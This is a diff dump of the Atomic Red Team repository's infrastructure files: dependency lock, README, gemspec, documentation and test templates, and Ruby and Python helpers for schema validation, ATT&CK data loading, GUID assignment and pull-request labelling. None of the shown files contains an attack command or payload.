atomic-red-team (1.0)
GEM
remote: https://rubygems.org/
specs:
activesupport (4.2.11.1)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.6.0)
public_suffix (>= 2.0.2, < 4.0)
coffee-script (2.4.1)
coffee-script-source
execjs
coffee-script-source (1.11.1)
colorator (1.1.0)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.5)
dnsruby (1.61.3)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
ffi (1.11.1)
forwardable-extended (2.6.0)
gemoji (3.0.1)
github-pages (198)
activesupport (= 4.2.11.1)
github-pages-health-check (= 1.16.1)
jekyll (= 3.8.5)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.5)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.12.1)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.14.0)
jekyll-relative-links (= 0.6.0)
jekyll-remote-theme (= 0.3.1)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
jekyll-theme-cayman (= 0.1.1)
jekyll-theme-dinky (= 0.1.1)
jekyll-theme-hacker (= 0.1.1)
jekyll-theme-leap-day (= 0.1.1)
jekyll-theme-merlot (= 0.1.1)
jekyll-theme-midnight (= 0.1.1)
jekyll-theme-minimal (= 0.1.1)
jekyll-theme-modernist (= 0.1.1)
jekyll-theme-primer (= 0.5.3)
jekyll-theme-slate (= 0.1.1)
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.10.2)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.5.0)
nokogiri (>= 1.8.5, < 2.0)
rouge (= 2.2.1)
terminal-table (~> 1.4)
github-pages-health-check (1.16.1)
addressable (~> 2.3)
dnsruby (~> 1.60)
octokit (~> 4.0)
public_suffix (~> 3.0)
typhoeus (~> 1.3)
html-pipeline (2.12.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.8.5)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
coffee-script-source (~> 1.11.1)
jekyll-commonmark (1.3.1)
commonmarker (~> 0.14)
jekyll (>= 3.7, < 5.0)
jekyll-commonmark-ghpages (0.1.5)
commonmarker (~> 0.17.6)
jekyll-commonmark (~> 1)
rouge (~> 2)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.12.1)
jekyll (~> 3.4)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
jekyll (~> 3.0)
jekyll-paginate (1.1.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.6.0)
jekyll (~> 3.3)
jekyll-remote-theme (0.3.1)
jekyll (~> 3.5)
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
jekyll-swiss (0.4.0)
jekyll-theme-architect (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-cayman (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-dinky (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-hacker (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-leap-day (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-merlot (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-midnight (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-minimal (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-modernist (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-primer (0.5.3)
jekyll (~> 3.5)
jekyll-github-metadata (~> 2.9)
jekyll-seo-tag (~> 2.0)
jekyll-theme-slate (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-tactile (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-time-machine (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.2.1)
listen (~> 3.0)
jemoji (0.10.2)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (~> 3.0)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.11.3)
multipart-post (2.1.1)
nokogiri (1.10.8)
mini_portile2 (~> 2.4.0)
octokit (4.14.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (3.1.1)
rb-fsevent (0.10.3)
rb-inotify (0.10.0)
ffi (~> 1.0)
rouge (2.2.1)
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (2.0.0)
safe_yaml (1.0.5)
sass (3.7.4)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
sawyer (0.8.2)
addressable (>= 2.3.5)
faraday (> 0.8, < 2.0)
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unicode-display_width (1.6.0)
PLATFORMS
ruby
DEPENDENCIES
atomic-red-team!
github-pages
BUNDLED WITH
1.17.3
README.md
+42 -28
View File
@@ -1,45 +1,59 @@
<p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>
# Atomic Red Team
[![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1730-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team allows every security team to test their controls by executing simple
"atomic tests" that exercise the same techniques used by adversaries (all mapped to
[Mitre's ATT&CK](https://attack.mitre.org)).
## Philosophy
Atomic Red Team is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
Atomic Red Team to quickly, portably, and reproducibly test their environments.
Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks.
## Get started
Three key beliefs made up the Atomic Red Team charter:
- **Teams need to be able to test everything from specific technical controls to outcomes.**
Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
what our controls and program can detect, and what it cannot. We dont have to detect every adversary, but we
do believe in knowing our blind spots.
You can execute atomic tests directly from the command line, no installation
required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
page of our wiki.
- **We should be able to run a test in less than five minutes.**
Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
run in a few minutes.
For a more robust testing experience, consider using an execution framework like
[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).
The best test is the one you actually run.
## Learn more
- **We need to keep learning how adversaries are operating.**
Most security teams dont have the benefit of seeing a wide variety of adversary types and techniques crossing
their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
which makes the community working together essential to making us all better.
The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).
See: https://atomicredteam.io
For information about the philosophy and development of Atomic Red Team, visit
our website at <https://atomicredteam.io>.
## Having trouble?
To stay up to date on all things Atomic Red Team, sign up for the Atomic Newsletter: https://redcanary.com/atomic-newsletter/
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
## Contribute to Atomic Red Team
## Getting Started
Atomic Red Team is open source and community developed. If you're interested in
becoming a contributor, check out these resources:
* [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team)
* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
- Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv))
- MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv))
- Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv))
* Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json))
* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications
* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
* Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
before you join.
- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
for more information about contributing directly to this repository.
- Check the [license](LICENSE.txt) for information regarding the distribution
and modification of Atomic Red Team.
- Contribute to linux atomics quickly from GitHub Codespaces. For more details, click [here](https://github.com/redcanaryco/atomic-red-team/wiki/Github-Codespaces)
## Code of Conduct
[![Open in GitHub Codespaces](https://github.com/codespaces/badge.svg)](https://codespaces.new/redcanaryco/atomic-red-team)
In order to have a more open and welcoming community, Atomic Red Team adheres to a
[code of conduct](CODE_OF_CONDUCT.md).
## License
See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
atomic-red-team.gemspec
+2 -2
View File
@@ -3,7 +3,7 @@ Gem::Specification.new do |s|
s.name = 'atomic-red-team'
s.version = '1.0'
s.authors = ['Red Canary', 'Casey Smith', 'Mike Haag']
s.email = ['it@redcanary.com', 'opensource@redcanary.com']
s.email = ['it@redcanary.com', 'casey.smith@redcanary.com', 'mike.haag@redcanary.com']
s.summary = 'Small, highly portable, community developed detection tests mapped to ATT&CK.'
s.license = "MIT"
s.homepage = "https://redcanary.com/atomic-red-team"
@@ -12,4 +12,4 @@ Gem::Specification.new do |s|
s.require_paths = %w(atomic_red_team)
s.add_development_dependency 'github-pages'
end
end
atomic_red_team/__init__.py
View File
atomic_red_team/atomic_doc_template.md.erb
+3 -11
View File
@@ -1,11 +1,7 @@
# <%= technique['identifier'] %> - <%= technique['name'] -%>
## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
<blockquote>
<%= technique['description'].gsub("%\\<", "%<") %>
</blockquote>
<blockquote><%= technique['description'] %></blockquote>
## Atomic Tests
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
@@ -29,17 +25,13 @@
end
end.join(', ') %>
**auto_generated_guid:** <%= test['auto_generated_guid'] %>
<%def cleanup(input)
input.to_s.strip.gsub(/\\/,"&#92;")
end%>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
@@ -83,7 +75,7 @@ end%>
##### Description: <%= dep['description'].strip %>
##### Check Prereq Commands:
```<%= get_language(dependency_executor) %>
<%= dep['prereq_command'].strip %>
<%= dep['prereq_command'].strip %>
```
##### Get Prereq Commands:
```<%= get_language(dependency_executor) %>
atomic_red_team/atomic_red_team.rb
+6 -29
View File
@@ -29,29 +29,6 @@ class AtomicRedTeam
end
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
def atomic_tests_for_technique_by_platform(technique_or_technique_identifier, platform)
technique_identifier = if technique_or_technique_identifier.is_a? Hash
ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
else
technique_or_technique_identifier
end
test_list = Array.new
atomic_tests.find do |atomic_yaml|
if atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
atomic_yaml['atomic_tests'].each do |a_test|
if a_test["supported_platforms"].include?(platform[:platform])
test_list.append(a_test)
end
end
end
end
test_list
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
@@ -78,18 +55,18 @@ class AtomicRedTeam
yaml_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.yaml"
markdown_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exist? markdown_file)
if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exists? markdown_file)
# we have a file for this technique, so link to it's Markdown file
"[#{link_display}](../../#{technique_identifier}/#{technique_identifier}.md)"
else
# we don't have a file for this technique, or there are not tests for the given platform, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
"#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)"
end
end
def atomic_yaml_has_test_for_platform(yaml_file, only_platform)
has_test_for_platform = false
if File.exist? yaml_file
if File.exists? yaml_file
yaml = YAML.load_file(yaml_file)
yaml['atomic_tests'].each_with_index do |atomic, i|
if atomic["supported_platforms"].any? {|platform| platform.downcase =~ only_platform}
@@ -131,7 +108,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp']
valid_supported_platforms = ['windows', 'macos', 'linux']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
@@ -165,7 +142,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -175,7 +152,7 @@ class AtomicRedTeam
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
when 'command_prompt', 'sh', 'bash', 'powershell'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
atomic_red_team/atomic_test_template.yaml
+36
View File
@@ -0,0 +1,36 @@
---
attack_technique: TODO
display_name: TODO
atomic_tests:
- name: TODO
description: |
TODO
supported_platforms:
- windows
- macos
- linux
input_arguments:
output_file:
description: TODO
type: todo
default: TODO
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
dependencies: # (optional)
- description: |
TODO
prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
TODO
executor:
name: command_prompt
elevation_required: true # indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false
command: | # these are the actaul attack commands, at least one command must be provided
TODO
cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
TODO
atomic_red_team/attack_api.rb
+4 -8
View File
@@ -75,11 +75,9 @@ class Attack
techniques_by_tactic = Hash.new {|h, k| h[k] = []}
techniques.each do |technique|
next unless !technique['x_mitre_platforms'].nil?
next unless technique['x_mitre_platforms'].any? { |platform| platform.downcase.sub(" ", "-") =~ only_platform }
next unless technique.fetch('revoked', false) == false
next unless technique.fetch('x_mitre_deprecated', false) == false
next unless technique['x_mitre_platforms'].any? {|platform| platform.downcase =~ only_platform}
technique.fetch('kill_chain_phases', []).select { |phase| phase['kill_chain_name'] == 'mitre-attack' }.each do |tactic|
technique.fetch('kill_chain_phases', []).select {|phase| phase['kill_chain_name'] == 'mitre-attack'}.each do |tactic|
techniques_by_tactic[tactic.fetch('phase_name')] << technique
end
end
@@ -90,10 +88,8 @@ class Attack
# Returns a list of all ATT&CK techniques
#
def techniques
return @techniques unless @techniques.nil?
# pull out the attack pattern objects
@techniques = attack_stix.fetch("objects").select do |item|
attack_stix.fetch("objects").select do |item|
item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references|
references['source_name'] == 'mitre-attack'
end
@@ -109,7 +105,7 @@ class Attack
@attack_stix ||= begin
# load the full attack library
local_attack_json_to_try = "#{File.dirname(__FILE__)}/enterprise-attack.json"
if File.exist? local_attack_json_to_try
if File.exists? local_attack_json_to_try
JSON.parse File.read(local_attack_json_to_try)
else
JSON.parse open('https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json').read
atomic_red_team/common.py
-5
View File
@@ -1,5 +0,0 @@
from os.path import dirname, realpath
base_path = dirname(dirname(realpath(__file__)))
atomics_path = f"{base_path}/atomics"
used_guids_file = f"{atomics_path}/used_guids.txt"
atomic_red_team/enterprise-attack.json
+235635 -613898
View File
File diff suppressed because one or more lines are too long
atomic_red_team/guid.py
-45
View File
@@ -1,45 +0,0 @@
import re
import uuid
from typing import List
from ruamel.yaml import YAML
from atomic_red_team.common import used_guids_file
yaml = YAML(typ="safe")
def get_unique_guid(guids: List[str]):
# This function should return a unique GUID that's not in the used_guids_file.
guid = str(uuid.uuid4())
if guid not in guids:
with open(used_guids_file, "a") as f: # append mode
f.write(f"{guid}\n")
return guid
else:
return get_unique_guid(guids)
def generate_guids_for_yaml(path, get_guid):
with open(path, "r") as file:
og_text = file.read()
# Add the "auto_generated_guid:" element after the "- name:" element if it isn't already there
text = re.sub(
r"(?i)(^([ \t]*-[ \t]*)name:.*$(?!\s*auto_generated_guid))",
lambda m: f"{m.group(1)}\n{m.group(2).replace('-', ' ')}auto_generated_guid:",
og_text,
flags=re.MULTILINE,
)
# Fill the "auto_generated_guid:" element in if it doesn't contain a guid
text = re.sub(
r"(?i)^([ \t]*auto_generated_guid:)(?!([ \t]*[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12})).*$",
lambda m: f"{m.group(1)} {get_guid()}",
text,
flags=re.MULTILINE,
)
if text != og_text:
with open(path, "wb") as file:
# using wb mode instead of w. If not, the end of line characters are auto-converted to OS specific ones.
file.write(text.encode())
atomic_red_team/labels.py
-163
View File
@@ -1,163 +0,0 @@
import fnmatch
import json
import os
import re
from dataclasses import dataclass
import requests
import yaml
from yaml.loader import SafeLoader
def get_technique_from_filename(filename):
"""Returns technique(Txxx.xxx) from the filename specified"""
return re.findall(r"T[.\d]{4,8}", filename)[0]
@dataclass
class ChangedAtomic:
"""Returns atomic technique with test number which can be later used to run atomics in CI/CD pipelines."""
technique: str
test_number: int
data: dict
class SafeLineLoader(SafeLoader):
def construct_mapping(self, node, deep=False):
"""Add line number to each block of the atomic test."""
mapping = super(SafeLineLoader, self).construct_mapping(node, deep=deep)
# Add 1 so line numbering starts at 1
mapping["__line__"] = node.start_mark.line + 1
return mapping
class GithubAPI:
labels = {
"windows": "windows",
"macos": "macOS",
"linux": "linux",
"azure-ad": "ADFS",
"containers": "containers",
"iaas:gcp": "cloud",
"iaas:aws": "cloud",
"iaas:azure": "cloud",
"office-365": "cloud",
"google-workspace": "cloud",
}
maintainers = {
"windows": ["clr2of8", "MHaggis"],
"linux": ["josehelps", "cyberbuff"],
"macos": ["josehelps", "cyberbuff"],
"containers": ["patel-bhavin"],
"iaas:gcp": ["patel-bhavin"],
"iaas:aws": ["patel-bhavin"],
"iaas:azure": ["patel-bhavin"],
"azure-ad": ["patel-bhavin"],
"google-workspace": ["patel-bhavin"],
"office-365": ["patel-bhavin"],
}
def __init__(self, token):
self.token = token
@property
def headers(self):
return {
"Authorization": f"Bearer {self.token}",
"X-GitHub-Api-Version": "2022-11-28",
"Accept": "application/vnd.github+json",
}
def get_atomic_with_lines(self, file_url: str):
"""Get Atomic Technique along with line number for each of the atomics."""
r = requests.get(file_url, headers=self.headers)
assert r.status_code == 200
return yaml.load(r.text, Loader=SafeLineLoader)
def get_files_for_pr(self, pr):
"""Get new and modified files in the `atomics` directory changed in a PR."""
response = requests.get(
f"https://api.github.com/repos/{os.getenv('GITHUB_REPOSITORY')}/pulls/{pr}/files",
headers=self.headers,
timeout=15,
)
assert response.status_code == 200
files = response.json()
return filter(
lambda x: x["status"] in ["added", "modified"]
and fnmatch.fnmatch(x["filename"], "atomics/T*/T*.yaml"),
files,
)
def get_tests_changed(self, pr: str):
"""Get all the tests changed in a PR"""
tests = []
start = 0
files = self.get_files_for_pr(pr)
for file in files:
data = self.get_atomic_with_lines(file["raw_url"])
technique = get_technique_from_filename(file["filename"])
if file["status"] == "added":
# New file; run the entire technique; Invoke-AtomicTest Txxxx
tests += [
ChangedAtomic(technique=technique, test_number=index + 1, data=t)
for index, t in enumerate(data["atomic_tests"])
]
else:
changed_lines = []
count = 0
for line in file["patch"].split("\n"):
if line.startswith("@@"):
x, y = re.findall(r"\d{1,3},\d{1,3}", line)
start = int(x.split(",")[0])
count = -1
elif line.startswith("+"): # only take count of added lines
changed_lines.append(start + count)
elif line.startswith("-"):
count -= 1
count += 1
atomics = data["atomic_tests"]
for index, t in enumerate(atomics):
curr_atomic_start = atomics[index]["__line__"]
if index + 1 < len(atomics):
curr_atomic_end = atomics[index + 1]["__line__"]
else:
curr_atomic_end = start + 60
changes_in_current_atomic = [
i
for i in changed_lines
if i > curr_atomic_start and i < curr_atomic_end
]
if len(changes_in_current_atomic) > 0:
tests.append(
ChangedAtomic(
technique=technique, test_number=index + 1, data=t
)
)
return tests
def save_labels_and_maintainers(self, pr):
"""Saves labels and maintainers into `pr/labels.json` which would be later used by a workflow run."""
tests = self.get_tests_changed(pr)
platforms = set()
for t in tests:
platforms.update(t.data["supported_platforms"])
labels = []
maintainers = []
for p in platforms:
if p in self.labels:
labels.append(self.labels[p])
if p in self.maintainers:
maintainers += self.maintainers[p]
os.mkdir("pr")
with open("pr/changedfiles.json", "w") as f:
x = [{"name": t.technique, "test_number": t.test_number} for t in tests]
f.write(json.dumps(x))
with open("pr/labels.json", "w") as f:
j = {"pr": pr, "labels": labels, "maintainers": maintainers}
f.write(json.dumps(j))
atomic_red_team/models.py
-247
View File
@@ -1,247 +0,0 @@
import re
from functools import reduce
from typing import Dict, List, Literal, Optional, Union
from uuid import UUID
from pydantic import (
AnyUrl,
BaseModel,
ConfigDict,
Field,
IPvAnyAddress,
StrictFloat,
StringConstraints,
conlist,
constr,
field_serializer,
field_validator,
model_validator,
)
from pydantic_core import PydanticCustomError
from pydantic_core.core_schema import ValidationInfo
from typing_extensions import Annotated, TypedDict
InputArgType = Literal["url", "string", "float", "integer", "path"]
Platform = Literal[
"windows",
"macos",
"linux",
"office-365",
"azure-ad",
"google-workspace",
"saas",
"iaas",
"containers",
"iaas:gcp",
"iaas:azure",
"iaas:aws",
"esxi",
]
ExecutorType = Literal["manual", "powershell", "sh", "bash", "command_prompt"]
DomainName = Annotated[
str,
StringConstraints(
pattern=r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"
),
]
AttackTechniqueID = Annotated[
str, StringConstraints(pattern=r"T\d{4}(?:\.\d{3})?", min_length=5)
]
def extract_mustached_keys(commands: List[Optional[str]]) -> List[str]:
result = []
for command in commands:
if command:
matches = re.finditer(r"#{(.*?)}", command, re.MULTILINE)
keys = [list(i.groups()) for i in matches]
keys = list(reduce(lambda x, y: x + y, keys, []))
result.extend(keys)
return list(set(result))
def get_supported_platform(platform: Platform):
platforms = {
"macos": "macOS",
"office-365": "Office 365",
"windows": "Windows",
"linux": "Linux",
"azure-ad": "Azure AD",
"iaas": "IaaS",
"saas": "SaaS",
"iaas:aws": "AWS",
"iaas:azure": "Azure",
"iaas:gcp": "GCP",
"google-workspace": "Google Workspace",
"containers": "Containers",
"esxi": "ESXi",
}
return platforms[platform]
def get_language(executor: ExecutorType):
if executor == "command_prompt":
return "cmd"
elif executor == "manual":
return ""
return executor
class BaseArgument(TypedDict):
description: str
class UrlArg(BaseArgument):
default: Optional[DomainName | AnyUrl | IPvAnyAddress]
type: Literal["url", "Url"]
@field_serializer("default")
def serialize_url(self, value):
return str(value)
class StringArg(BaseArgument):
default: Optional[str]
type: Literal["string", "path", "String", "Path"]
class IntArg(BaseArgument):
default: Optional[int]
type: Literal["integer", "Integer"]
class FloatArg(BaseArgument):
default: Optional[StrictFloat]
type: Literal["float", "Float"]
Argument = Annotated[
Union[FloatArg, IntArg, UrlArg, StringArg], Field(discriminator="type")
]
class Executor(BaseModel):
name: ExecutorType
elevation_required: bool = False
class ManualExecutor(Executor):
name: Literal["manual"]
steps: str = Field(..., min_length=10)
class CommandExecutor(Executor):
name: Literal["powershell", "sh", "bash", "command_prompt"]
command: constr(min_length=1)
cleanup_command: Optional[str] = None
class Dependency(BaseModel):
description: constr(min_length=1)
prereq_command: constr(min_length=1)
get_prereq_command: Optional[str]
class Atomic(BaseModel):
model_config = ConfigDict(
validate_default=True, extra="forbid", validate_assignment=True
)
test_number: Optional[str] = None
name: constr(min_length=1)
description: constr(min_length=1)
supported_platforms: conlist(Platform, min_length=1)
executor: Union[ManualExecutor, CommandExecutor] = Field(..., discriminator="name")
dependencies: Optional[List[Dependency]] = []
input_arguments: Dict[constr(min_length=2, pattern=r"^[\w_-]+$"), Argument] = {}
dependency_executor_name: ExecutorType = "manual"
auto_generated_guid: Optional[UUID] = None
@classmethod
def extract_mustached_keys(cls, value: dict) -> List[str]:
commands = []
executor = value.get("executor")
if isinstance(executor, CommandExecutor):
commands = [executor.command, executor.cleanup_command]
if isinstance(executor, ManualExecutor):
commands = [executor.steps]
